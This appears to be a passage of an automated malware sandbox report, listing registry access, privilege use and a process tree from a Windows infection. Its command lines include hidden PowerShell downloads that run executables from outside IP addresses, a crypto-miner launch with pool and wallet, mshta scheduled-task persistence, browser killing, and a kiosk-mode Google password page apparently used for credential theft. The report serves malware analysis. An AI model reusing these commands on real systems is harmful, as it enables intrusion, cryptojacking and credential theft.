| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"
C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe
"C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5995.tmp\5996.tmp\5997.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5muhcagw\5muhcagw.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAB10.tmp" "c:\Users\Admin\AppData\Local\Temp\5muhcagw\CSCE2143F3F87124EFFBE7090E7EC1FD14.TMP"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe
"C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe"
C:\Users\Admin\AppData\Local\Temp\dll32.exe
"C:\Users\Admin\AppData\Local\Temp\dll32.exe"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe
"C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\3277ecaa2a.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn hBpNSma7kUh /tr "mshta C:\Users\Admin\AppData\Local\Temp\kAxSdUV2p.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE
"C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp3D4D.tmp.bat
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\system32\tasklist.exe
Tasklist /fi "PID eq 4264"
C:\Windows\system32\find.exe
find ":"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe
"C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe"
C:\Windows\system32\timeout.exe
Timeout /T 1 /Nobreak
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "R0yhcmahnHj" /tr "mshta \"C:\Temp\WK6TyvNYU.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\WK6TyvNYU.hta"
C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe
"C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe
"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"
C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe
"C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1584 -ip 1584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 812
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe
"C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe
"C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\nxpsp\mcsq.exe
C:\ProgramData\nxpsp\mcsq.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe
"C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --disable-gpu
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffa2898cc40,0x7ffa2898cc4c,0x7ffa2898cc58
C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe
"C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1408,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1400 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1372,i,14568539947306955284,2076734954859821730,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1644 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe
"C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe"
C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe
"C:\Users\Admin\AppData\Local\Temp\10107520101\8c305bd773.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1968 -parentBuildID 20240401114208 -prefsHandle 1884 -prefMapHandle 1876 -prefsLen 26973 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {89434cc4-5c02-4e46-9952-f5b162d41cf7} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" gpu
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 1940"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2404 -parentBuildID 20240401114208 -prefsHandle 2396 -prefMapHandle 2392 -prefsLen 27893 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bcefe755-ed17-4c92-8eba-b3eeafe2e8c9} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2992 -childID 1 -isForBrowser -prefsHandle 2984 -prefMapHandle 2980 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6aee126-02ba-4091-ab76-345d3946e11b} 2256 "\\.\pipe\gecko-crash-server-pipe.2256" tab
C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe
"C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
